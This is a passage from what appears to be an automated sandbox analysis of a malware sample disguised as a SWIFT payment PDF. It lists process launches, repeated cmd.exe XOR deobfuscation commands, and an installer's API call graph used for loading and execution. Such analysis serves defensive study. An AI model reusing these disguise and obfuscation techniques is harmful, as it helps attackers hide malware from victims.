                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:117
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:118
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "133^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:119
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:120
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "157^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:121
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:122
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:123
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:124
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "216^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:125
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:126
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:127
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:128
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:129
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:130
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "201^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:131
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:132
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "137^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:133
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:134
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:135
                                    Start time:13:38:30
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:136
                                    Start time:13:39:06
                                    Start date:26/04/2024
                                    Path:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
                                    Imagebase:0x400000
                                    File size:421'592 bytes
                                    MD5 hash:1048340BCFAE30DF032C161AC52F8F0E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:140
                                    Start time:13:39:21
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092
                                    Imagebase:0x650000
                                    File size:482'640 bytes
                                    MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:22%
                                      Dynamic/Decrypted Code Coverage:15.3%
                                      Signature Coverage:19.4%
                                      Total number of Nodes:1493
                                      Total number of Limit Nodes:50
                                      execution_graph 4762 10001000 4765 1000101b 4762->4765 4772 100014d8 4765->4772 4767 10001020 4768 10001024 4767->4768 4769 10001027 GlobalAlloc 4767->4769 4770 100014ff 3 API calls 4768->4770 4769->4768 4771 10001019 4770->4771 4773 1000123b 3 API calls 4772->4773 4774 100014de 4773->4774 4775 100014e4 4774->4775 4776 100014f0 GlobalFree 4774->4776 4775->4767 4776->4767 4777 4019c0 4778 402a07 18 API calls 4777->4778 4779 4019c7 4778->4779 4780 402a07 18 API calls 4779->4780 4781 4019d0 4780->4781 4782 4019d7 lstrcmpiA 4781->4782 4783 4019e9 lstrcmpA 4781->4783 4784 4019dd 4782->4784 4783->4784 3726 404fc2 3727 404fe3 GetDlgItem GetDlgItem GetDlgItem 3726->3727 3728 40516e 3726->3728 3773 403ebc SendMessageA 3727->3773 3730 405177 GetDlgItem CreateThread FindCloseChangeNotification 3728->3730 3731 40519f 3728->3731 3730->3731 3846 404f56 OleInitialize 3730->3846 3733 4051ca 3731->3733 3734 4051b6 ShowWindow ShowWindow 3731->3734 3735 4051ec 3731->3735 3732 405054 3738 40505b GetClientRect GetSystemMetrics SendMessageA SendMessageA 3732->3738 3736 4051d3 3733->3736 3737 405228 3733->3737 3778 403ebc SendMessageA 3734->3778 3782 403eee 3735->3782 3740 405201 ShowWindow 3736->3740 3741 4051db 3736->3741 3737->3735 3745 405233 SendMessageA 3737->3745 3743 4050ca 3738->3743 3744 4050ae SendMessageA SendMessageA 3738->3744 3748 405221 3740->3748 3749 405213 3740->3749 3779 403e60 3741->3779 3752 4050dd 3743->3752 3753 4050cf SendMessageA 3743->3753 3744->3743 3747 4051fa 3745->3747 3754 40524c CreatePopupMenu 3745->3754 3751 403e60 SendMessageA 3748->3751 3796 404e84 3749->3796 3751->3737 3774 403e87 3752->3774 3753->3752 3807 405b99 3754->3807 3758 4050ed 3761 4050f6 ShowWindow 3758->3761 3762 40512a GetDlgItem SendMessageA 3758->3762 3759 405282 3764 40528b TrackPopupMenu 3759->3764 3760 40526f GetWindowRect 3760->3764 3765 405119 3761->3765 3766 40510c ShowWindow 3761->3766 3762->3747 3763 405151 SendMessageA SendMessageA 3762->3763 3763->3747 3764->3747 3767 4052a9 3764->3767 3777 403ebc SendMessageA 3765->3777 3766->3765 3768 4052c5 SendMessageA 3767->3768 3768->3768 3770 4052e2 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3768->3770 3771 405304 SendMessageA 3770->3771 3771->3771 3772 405326 GlobalUnlock SetClipboardData CloseClipboard 3771->3772 3772->3747 3773->3732 3775 405b99 18 API calls 3774->3775 3776 403e92 SetDlgItemTextA 3775->3776 3776->3758 3777->3762 3778->3733 3780 403e67 3779->3780 3781 403e6d SendMessageA 3779->3781 3780->3781 3781->3735 3783 403f06 GetWindowLongA 3782->3783 3793 403f8f 3782->3793 3784 403f17 3783->3784 3783->3793 3785 403f26 GetSysColor 3784->3785 3786 403f29 3784->3786 3785->3786 3787 403f39 SetBkMode 3786->3787 3788 403f2f SetTextColor 3786->3788 3789 403f51 GetSysColor 3787->3789 3790 403f57 3787->3790 3788->3787 3789->3790 3791 403f68 3790->3791 3792 403f5e SetBkColor 3790->3792 3791->3793 3794 403f82 CreateBrushIndirect 3791->3794 3795 403f7b DeleteObject 3791->3795 3792->3791 3793->3747 3794->3793 3795->3794 3797 404f42 3796->3797 3798 404e9f 3796->3798 3797->3748 3799 404ebc lstrlenA 3798->3799 3800 405b99 18 API calls 3798->3800 3801 404ee5 3799->3801 3802 404eca lstrlenA 3799->3802 3800->3799 3803 404ef8 3801->3803 3804 404eeb SetWindowTextA 3801->3804 3802->3797 3805 404edc lstrcatA 3802->3805 3803->3797 3806 404efe SendMessageA SendMessageA SendMessageA 3803->3806 3804->3803 3805->3801 3806->3797 3812 405ba6 3807->3812 3808 405dc9 3809 40525c AppendMenuA 3808->3809 3841 405b77 lstrcpynA 3808->3841 3809->3759 3809->3760 3811 405c47 GetVersion 3811->3812 3812->3808 3812->3811 3813 405da0 lstrlenA 3812->3813 3814 405b99 10 API calls 3812->3814 3818 405cbf GetSystemDirectoryA 3812->3818 3819 405cd2 GetWindowsDirectoryA 3812->3819 3821 405b99 10 API calls 3812->3821 3822 405d49 lstrcatA 3812->3822 3823 405d06 SHGetSpecialFolderLocation 3812->3823 3825 405a5e RegOpenKeyExA 3812->3825 3830 405de2 3812->3830 3839 405ad5 wsprintfA 3812->3839 3840 405b77 lstrcpynA 3812->3840 3813->3812 3814->3813 3818->3812 3819->3812 3821->3812 3822->3812 3823->3812 3824 405d1e SHGetPathFromIDListA CoTaskMemFree 3823->3824 3824->3812 3826 405a91 RegQueryValueExA 3825->3826 3827 405acf 3825->3827 3828 405ab2 RegCloseKey 3826->3828 3827->3812 3828->3827 3837 405dee 3830->3837 3831 405e56 3832 405e5a CharPrevA 3831->3832 3835 405e75 3831->3835 3832->3831 3833 405e4b CharNextA 3833->3831 3833->3837 3835->3812 3836 405e39 CharNextA 3836->3837 3837->3831 3837->3833 3837->3836 3838 405e46 CharNextA 3837->3838 3842 40564f 3837->3842 3838->3833 3839->3812 3840->3812 3841->3809 3843 405655 3842->3843 3844 405668 3843->3844 3845 40565b CharNextA 3843->3845 3844->3837 3845->3843 3853 403ed3 3846->3853 3848 403ed3 SendMessageA 3849 404fb2 OleUninitialize 3848->3849 3851 404fa0 3851->3848 3852 404f79 3852->3851 3856 401389 3852->3856 3854 403eeb 3853->3854 3855 403edc SendMessageA 3853->3855 3854->3852 3855->3854 3858 401390 3856->3858 3857 4013fe 3857->3852 3858->3857 3859 4013cb MulDiv SendMessageA 3858->3859 3859->3858 4785 4042c5 4786 4042f1 4785->4786 4787 404302 4785->4787 4846 40538c GetDlgItemTextA 4786->4846 4789 40430e GetDlgItem 4787->4789 4796 40436d 4787->4796 4792 404322 4789->4792 4790 404451 4795 4045ec 4790->4795 4848 40538c GetDlgItemTextA 4790->4848 4791 4042fc 4793 405de2 5 API calls 4791->4793 4794 404336 SetWindowTextA 4792->4794 4798 4056bd 4 API calls 4792->4798 4793->4787 4799 403e87 19 API calls 4794->4799 4802 403eee 8 API calls 4795->4802 4796->4790 4796->4795 4800 405b99 18 API calls 4796->4800 4804 40432c 4798->4804 4805 404352 4799->4805 4806 4043e1 SHBrowseForFolderA 4800->4806 4801 404481 4807 405712 18 API calls 4801->4807 4803 404600 4802->4803 4804->4794 4811 405624 3 API calls 4804->4811 4808 403e87 19 API calls 4805->4808 4806->4790 4809 4043f9 CoTaskMemFree 4806->4809 4810 404487 4807->4810 4812 404360 4808->4812 4813 405624 3 API calls 4809->4813 4849 405b77 lstrcpynA 4810->4849 4811->4794 4847 403ebc SendMessageA 4812->4847 4815 404406 4813->4815 4818 40443d SetDlgItemTextA 4815->4818 4822 405b99 18 API calls 4815->4822 4817 404366 4820 405ea2 3 API calls 4817->4820 4818->4790 4819 40449e 4821 405ea2 3 API calls 4819->4821 4820->4796 4828 4044a6 4821->4828 4824 404425 lstrcmpiA 4822->4824 4823 4044e0 4850 405b77 lstrcpynA 4823->4850 4824->4818 4825 404436 lstrcatA 4824->4825 4825->4818 4827 4044e7 4829 4056bd 4 API calls 4827->4829 4828->4823 4833 40566b 2 API calls 4828->4833 4834 404531 4828->4834 4830 4044ed GetDiskFreeSpaceA 4829->4830 4832 40450f MulDiv 4830->4832 4830->4834 4832->4834 4833->4828 4843 40459b 4834->4843 4851 40466d 4834->4851 4835 4045be 4859 403ea9 KiUserCallbackDispatcher 4835->4859 4837 40140b 2 API calls 4837->4835 4838 40458d 4840 404592 4838->4840 4841 40459d SetDlgItemTextA 4838->4841 4842 40466d 21 API calls 4840->4842 4841->4843 4842->4843 4843->4835 4843->4837 4844 4045da 4844->4795 4860 40425a 4844->4860 4846->4791 4847->4817 4848->4801 4849->4819 4850->4827 4852 404687 4851->4852 4853 405b99 18 API calls 4852->4853 4854 4046bc 4853->4854 4855 405b99 18 API calls 4854->4855 4856 4046c7 4855->4856 4857 405b99 18 API calls 4856->4857 4858 4046f8 lstrlenA wsprintfA SetDlgItemTextA 4857->4858 4858->4838 4859->4844 4861 404268 4860->4861 4862 40426d SendMessageA 4860->4862 4861->4862 4862->4795 3863 4023c6 3874 402b11 3863->3874 3865 4023d0 3878 402a07 3865->3878 3868 4023e3 RegQueryValueExA 3869 402409 RegCloseKey 3868->3869 3870 402403 3868->3870 3872 40266d 3869->3872 3870->3869 3884 405ad5 wsprintfA 3870->3884 3875 402a07 18 API calls 3874->3875 3876 402b2a 3875->3876 3877 402b38 RegOpenKeyExA 3876->3877 3877->3865 3879 402a13 3878->3879 3880 405b99 18 API calls 3879->3880 3881 402a34 3880->3881 3882 4023d9 3881->3882 3883 405de2 5 API calls 3881->3883 3882->3868 3882->3872 3883->3882 3884->3869 4076 4014ca 4077 404e84 25 API calls 4076->4077 4078 4014d1 4077->4078 4863 401ccc GetDlgItem GetClientRect 4864 402a07 18 API calls 4863->4864 4865 401cfc LoadImageA SendMessageA 4864->4865 4866 401d1a DeleteObject 4865->4866 4867 40289c 4865->4867 4866->4867 4868 402b4c 4869 402b74 4868->4869 4870 402b5b SetTimer 4868->4870 4871 402bc9 4869->4871 4872 402b8e MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4869->4872 4870->4869 4872->4871 4873 40264f 4874 402a07 18 API calls 4873->4874 4875 402656 FindFirstFileA 4874->4875 4876 402679 4875->4876 4880 402669 4875->4880 4881 405ad5 wsprintfA 4876->4881 4878 402680 4882 405b77 lstrcpynA 4878->4882 4881->4878 4882->4880 4883 4024cf 4884 4024d4 4883->4884 4885 4024e5 4883->4885 4886 4029ea 18 API calls 4884->4886 4887 402a07 18 API calls 4885->4887 4889 4024db 4886->4889 4888 4024ec lstrlenA 4887->4888 4888->4889 4890 40250b WriteFile 4889->4890 4891 40266d 4889->4891 4890->4891 4472 401650 4473 402a07 18 API calls 4472->4473 4474 401657 4473->4474 4475 402a07 18 API calls 4474->4475 4476 401660 4475->4476 4477 402a07 18 API calls 4476->4477 4478 401669 MoveFileA 4477->4478 4479 401675 4478->4479 4480 40167c 4478->4480 4482 401423 25 API calls 4479->4482 4481 405e7b 2 API calls 4480->4481 4484 40217f 4480->4484 4483 40168b 4481->4483 4482->4484 4483->4484 4485 405a2b 40 API calls 4483->4485 4485->4479 4892 10002110 4893 10002175 4892->4893 4894 100021ab 4892->4894 4893->4894 4895 10002187 GlobalAlloc 4893->4895 4895->4893 4896 403fd0 4897 403fe6 4896->4897 4903 4040f2 4896->4903 4899 403e87 19 API calls 4897->4899 4898 404161 4900 404235 4898->4900 4901 40416b GetDlgItem 4898->4901 4902 40403c 4899->4902 4905 403eee 8 API calls 4900->4905 4906 404181 4901->4906 4907 4041f3 4901->4907 4904 403e87 19 API calls 4902->4904 4903->4898 4903->4900 4908 404136 GetDlgItem SendMessageA 4903->4908 4909 404049 CheckDlgButton 4904->4909 4910 404230 4905->4910 4906->4907 4911 4041a7 6 API calls 4906->4911 4907->4900 4912 404205 4907->4912 4927 403ea9 KiUserCallbackDispatcher 4908->4927 4925 403ea9 KiUserCallbackDispatcher 4909->4925 4911->4907 4916 40420b SendMessageA 4912->4916 4917 40421c 4912->4917 4914 40415c 4918 40425a SendMessageA 4914->4918 4916->4917 4917->4910 4920 404222 SendMessageA 4917->4920 4918->4898 4919 404067 GetDlgItem 4926 403ebc SendMessageA 4919->4926 4920->4910 4922 40407d SendMessageA 4923 4040a4 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4922->4923 4924 40409b GetSysColor 4922->4924 4923->4910 4924->4923 4925->4919 4926->4922 4927->4914 4928 4014d6 4929 4029ea 18 API calls 4928->4929 4930 4014dc Sleep 4929->4930 4932 40289c 4930->4932 4933 401dd8 4934 402a07 18 API calls 4933->4934 4935 401dde 4934->4935 4936 402a07 18 API calls 4935->4936 4937 401de7 4936->4937 4938 402a07 18 API calls 4937->4938 4939 401df0 4938->4939 4940 402a07 18 API calls 4939->4940 4941 401df9 4940->4941 4942 401423 25 API calls 4941->4942 4943 401e00 ShellExecuteA 4942->4943 4944 401e2d 4943->4944 4676 40155b 4677 401577 ShowWindow 4676->4677 4678 40157e 4676->4678 4677->4678 4679 40158c ShowWindow 4678->4679 4680 40289c 4678->4680 4679->4680 4945 401edc 4946 402a07 18 API calls 4945->4946 4947 401ee3 GetFileVersionInfoSizeA 4946->4947 4948 401f06 GlobalAlloc 4947->4948 4949 401f5c 4947->4949 4948->4949 4950 401f1a GetFileVersionInfoA 4948->4950 4950->4949 4951 401f2b VerQueryValueA 4950->4951 4951->4949 4952 401f44 4951->4952 4956 405ad5 wsprintfA 4952->4956 4954 401f50 4957 405ad5 wsprintfA 4954->4957 4956->4954 4957->4949 4681 4025dd 4682 4025e4 4681->4682 4685 402849 4681->4685 4683 4029ea 18 API calls 4682->4683 4684 4025ef 4683->4684 4686 4025f6 SetFilePointer 4684->4686 4686->4685 4687 402606 4686->4687 4689 405ad5 wsprintfA 4687->4689 4689->4685 4958 4035e0 4959 4035eb 4958->4959 4960 4035f2 GlobalAlloc 4959->4960 4961 4035ef 4959->4961 4960->4961 4967 4018e3 4968 40191a 4967->4968 4969 402a07 18 API calls 4968->4969 4970 40191f 4969->4970 4971 405454 71 API calls 4970->4971 4972 401928 4971->4972 4973 4018e6 4974 402a07 18 API calls 4973->4974 4975 4018ed 4974->4975 4976 4053a8 MessageBoxIndirectA 4975->4976 4977 4018f6 4976->4977 3885 401f68 3886 401f7a 3885->3886 3896 402028 3885->3896 3887 402a07 18 API calls 3886->3887 3888 401f81 3887->3888 3890 402a07 18 API calls 3888->3890 3889 401423 25 API calls 3894 40217f 3889->3894 3891 401f8a 3890->3891 3892 401f92 GetModuleHandleA 3891->3892 3893 401f9f LoadLibraryExA 3891->3893 3892->3893 3895 401faf GetProcAddress 3892->3895 3893->3895 3893->3896 3897 401ffb 3895->3897 3898 401fbe 3895->3898 3896->3889 3899 404e84 25 API calls 3897->3899 3900 401fc6 3898->3900 3901 401fdd 3898->3901 3902 401fce 3899->3902 3949 401423 3900->3949 3906 100016da 3901->3906 3902->3894 3904 40201c FreeLibrary 3902->3904 3904->3894 3907 1000170a 3906->3907 3952 10001a86 3907->3952 3909 10001711 3910 10001827 3909->3910 3911 10001722 3909->3911 3912 10001729 3909->3912 3910->3902 4001 10002165 3911->4001 3983 100021af 3912->3983 3917 1000178d 3922 10001793 3917->3922 3923 100017cf 3917->3923 3918 1000176f 4014 1000236d 3918->4014 3919 10001758 3924 1000175d 3919->3924 3932 1000174e 3919->3932 3920 1000173f 3928 10001750 3920->3928 3929 10001745 3920->3929 3931 10001576 3 API calls 3922->3931 3926 1000236d 14 API calls 3923->3926 4011 10002a57 3924->4011 3933 100017c1 3926->3933 4005 10002540 3928->4005 3929->3932 3995 1000279c 3929->3995 3936 100017a9 3931->3936 3932->3917 3932->3918 3937 100017d6 3933->3937 3939 1000236d 14 API calls 3936->3939 3940 10001816 3937->3940 4038 10002333 3937->4038 3939->3933 3940->3910 3942 10001820 GlobalFree 3940->3942 3942->3910 3946 10001802 3946->3940 4042 100014ff wsprintfA 3946->4042 3947 100017fb FreeLibrary 3947->3946 3950 404e84 25 API calls 3949->3950 3951 401431 3950->3951 3951->3902 4045 10001215 GlobalAlloc 3952->4045 3954 10001aaa 4046 10001215 GlobalAlloc 3954->4046 3956 10001ab5 4047 1000123b 3956->4047 3958 10001cc5 GlobalFree GlobalFree GlobalFree 3959 10001ce2 3958->3959 3976 10001d2c 3958->3976 3960 1000201b 3959->3960 3969 10001cf7 3959->3969 3959->3976 3962 1000203c GetModuleHandleA 3960->3962 3960->3976 3961 10001b6f GlobalAlloc 3978 10001abd 3961->3978 3964 1000204d LoadLibraryA 3962->3964 3965 1000205e 3962->3965 3963 10001be3 GlobalFree 3963->3978 3964->3965 3964->3976 4058 100015c1 GetProcAddress 3965->4058 3966 10001bbe lstrcpyA 3967 10001bc8 lstrcpyA 3966->3967 3967->3978 3969->3976 4054 10001224 3969->4054 3970 10002070 3971 10002081 lstrlenA 3970->3971 3970->3976 4059 100015c1 GetProcAddress 3971->4059 3975 10001fbf lstrcpyA 3975->3978 3976->3909 3977 1000209a 3977->3976 3978->3958 3978->3961 3978->3963 3978->3966 3978->3967 3978->3975 3979 10001c25 3978->3979 3980 10001e78 GlobalFree 3978->3980 3982 10001224 2 API calls 3978->3982 4057 10001215 GlobalAlloc 3978->4057 3979->3978 4052 10001551 GlobalSize GlobalAlloc 3979->4052 3980->3978 3982->3978 3989 100021c7 3983->3989 3984 10001224 GlobalAlloc lstrcpynA 3984->3989 3985 1000123b 3 API calls 3985->3989 3987 100022fc GlobalFree 3988 1000172f 3987->3988 3987->3989 3988->3919 3988->3920 3988->3932 3989->3984 3989->3985 3989->3987 3990 10002284 GlobalAlloc MultiByteToWideChar 3989->3990 3991 10002263 lstrlenA 3989->3991 4062 100012bf 3989->4062 3992 10002272 3990->3992 3993 100022ae GlobalAlloc CLSIDFromString GlobalFree 3990->3993 3991->3987 3991->3992 3992->3987 4067 100024d4 3992->4067 3993->3987 3997 100027ae 3995->3997 3996 10002853 VirtualAlloc 3998 10002871 3996->3998 3997->3996 3999 10002962 GetLastError 3998->3999 4000 1000296d 3998->4000 3999->4000 4000->3932 4002 10002175 4001->4002 4003 10001728 4001->4003 4002->4003 4004 10002187 GlobalAlloc 4002->4004 4003->3912 4004->4002 4008 1000255c 4005->4008 4006 100025c0 4009 100025c5 GlobalSize 4006->4009 4010 100025cf 4006->4010 4007 100025ad GlobalAlloc 4007->4010 4008->4006 4008->4007 4009->4010 4010->3932 4012 10002a62 4011->4012 4013 10002aa2 GlobalFree 4012->4013 4019 10002388 4014->4019 4016 1000246c lstrcpyA 4016->4019 4017 100023cc wsprintfA 4017->4019 4018 10002444 lstrcpynA 4018->4019 4019->4016 4019->4017 4019->4018 4020 1000248d GlobalFree 4019->4020 4021 100024b6 GlobalFree 4019->4021 4023 10002421 WideCharToMultiByte 4019->4023 4024 100023e0 GlobalAlloc StringFromGUID2 WideCharToMultiByte GlobalFree 4019->4024 4025 10001278 2 API calls 4019->4025 4070 10001215 GlobalAlloc 4019->4070 4071 100012e8 4019->4071 4020->4019 4021->4019 4022 10001775 4021->4022 4027 10001576 4022->4027 4023->4019 4024->4019 4025->4019 4075 10001215 GlobalAlloc 4027->4075 4029 1000157c 4030 10001589 lstrcpyA 4029->4030 4032 100015a3 4029->4032 4033 100015bd 4030->4033 4032->4033 4034 100015a8 wsprintfA 4032->4034 4035 10001278 4033->4035 4034->4033 4036 10001281 GlobalAlloc lstrcpynA 4035->4036 4037 100012ba GlobalFree 4035->4037 4036->4037 4037->3937 4039 10002341 4038->4039 4040 100017e2 4038->4040 4039->4040 4041 1000235a GlobalFree 4039->4041 4040->3946 4040->3947 4041->4039 4043 10001278 2 API calls 4042->4043 4044 10001520 4043->4044 4044->3940 4045->3954 4046->3956 4048 10001274 4047->4048 4049 10001245 4047->4049 4048->3978 4049->4048 4060 10001215 GlobalAlloc 4049->4060 4051 10001251 lstrcpyA GlobalFree 4051->3978 4053 1000156f 4052->4053 4053->3979 4061 10001215 GlobalAlloc 4054->4061 4056 10001233 lstrcpynA 4056->3976 4057->3978 4058->3970 4059->3977 4060->4051 4061->4056 4063 100012e3 4062->4063 4064 100012c7 4062->4064 4063->4063 4064->4063 4065 10001224 2 API calls 4064->4065 4066 100012e1 4065->4066 4066->3989 4068 100024e2 VirtualAlloc 4067->4068 4069 10002538 4067->4069 4068->4069 4069->3992 4070->4019 4072 